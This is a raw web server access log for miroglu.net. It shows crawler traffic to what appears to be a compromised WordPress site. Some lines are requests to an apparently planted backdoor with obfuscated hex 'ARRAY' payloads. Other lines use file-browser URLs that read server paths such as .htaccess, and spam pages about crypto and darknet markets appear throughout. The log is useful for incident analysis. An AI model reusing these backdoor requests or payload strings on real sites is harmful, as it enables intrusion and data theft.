216.73.217.33 - - [19/Apr/2026:09:52:06 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0233-kopya-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.246.23.48 - - [19/Apr/2026:09:52:07 +0300] "GET /discover-the-convenience-of-safepal-wallet-today/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/images HTTP/1.1" 200 5849 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.217.33 - - [19/Apr/2026:09:52:10 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0353-kopya-848x450.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:14 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0403-kopya-2-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:18 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0231-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:50:19 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353031392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313431392q6165663935386639626566386630326463633330386133653939663361356564222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
198.244.240.34 - - [19/Apr/2026:09:52:19 +0300] "GET /kraken-aktual-nye-shagi-dlia-bezopasnogo-vkhoda-v-darknet/ HTTP/2" 200 6964 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:52:22 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0342-kopya-850x479.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:26 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0344-kopya-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:30 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0324-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:34 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0137-kopya-848x480.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:38 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fcunokarviziton-2048x1151.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:50:41 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353034312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313434312q3338613062303937393132663563323635323362626137646562633836663666222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:52:42 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0135-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:46 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0403-kopya-2-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:49 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0249-kopya-2-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:53 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0226-kopya-480x160.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.183.130 - - [19/Apr/2026:09:52:54 +0300] "GET /detail/875041014 HTTP/2" 200 6963 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:52:57 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0342-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:01 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0135-kopya-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:51:03 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353036332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313436332q3436646132626364613737623561623166393039613636373265303966376364222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:53:07 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0324-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:09 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FxV1JKmdy_400x400-400x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:13 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0367-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:17 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0226-kopya-150x150.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:21 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F2tYmC0R__400x400-400x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2872 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:25 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0225-kopya-848x450.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:51:25 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353038352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313438352q6364613561666630313162396265656161633630626565633064383534393239222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:53:29 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0123-kopya-848x450.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.240.216 - - [19/Apr/2026:09:53:32 +0300] "GET /detail/742067641 HTTP/2" 200 6952 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:53:33 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0367-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:37 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0299-kopya-150x150.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:40 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0324-kopya-2-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:44 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0135-kopya-2-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:51:47 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353130372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313530372q3162626530333132353362306137646338653561623366613033636137383635222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:53:48 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0332-kopya-150x150.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.172 - - [19/Apr/2026:09:53:47 +0300] "GET /shop/remonstration/probing162528321502.html HTTP/1.1" 200 30119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.33 - - [19/Apr/2026:09:53:52 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fcropped-logokucuk-270x270.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:53:56 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0324-kopya-2-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:00 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0225-kopya-480x160.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:04 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0135-kopya-2-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:07 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0341-kopya-150x150.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:52:09 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353132392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313532392q3833353239363465306632666433383635386439343336303335663537653035222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:54:11 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0382-kopya-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.173 - - [19/Apr/2026:09:54:12 +0300] "GET /shop/egyptized/dragged36143190238.html HTTP/1.1" 200 30310 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
51.195.244.125 - - [19/Apr/2026:09:54:18 +0300] "GET /detail/722068592 HTTP/2" 200 6961 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:54:19 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0240-kopya-1-850x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:22 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0367-kopya-768x407.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:26 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fcunokarviziton-1170x650.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.241.227.188 - - [19/Apr/2026:09:54:27 +0300] "GET /discover-the-power-of-dexscreener-for-efficient-trading/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/my-monitoring-logs/monitoring-2026-03-28.log&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/my-monitoring-logs HTTP/1.1" 200 4234 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.172 - - [19/Apr/2026:09:54:26 +0300] "GET /shop/hereticate/boxwood164162195251.html HTTP/1.1" 200 29950 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [19/Apr/2026:09:52:31 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353135312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313535312q3831343838313236366464376165363235623065646561396232356536353135222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:54:34 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0225-kopya-2-848x450.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:37 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0332-kopya-850x567.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.246.15.181 - - [19/Apr/2026:09:54:39 +0300] "GET /discovering-raydium-the-future-of-efficient-crypto-swaps/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/uploads/elementor HTTP/1.1" 200 4272 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.19.130 - - [19/Apr/2026:09:54:41 +0300] "GET /benefits-of-using-solscan-for-crypto-investors/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/css/.htaccess&path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/css HTTP/1.1" 200 3872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
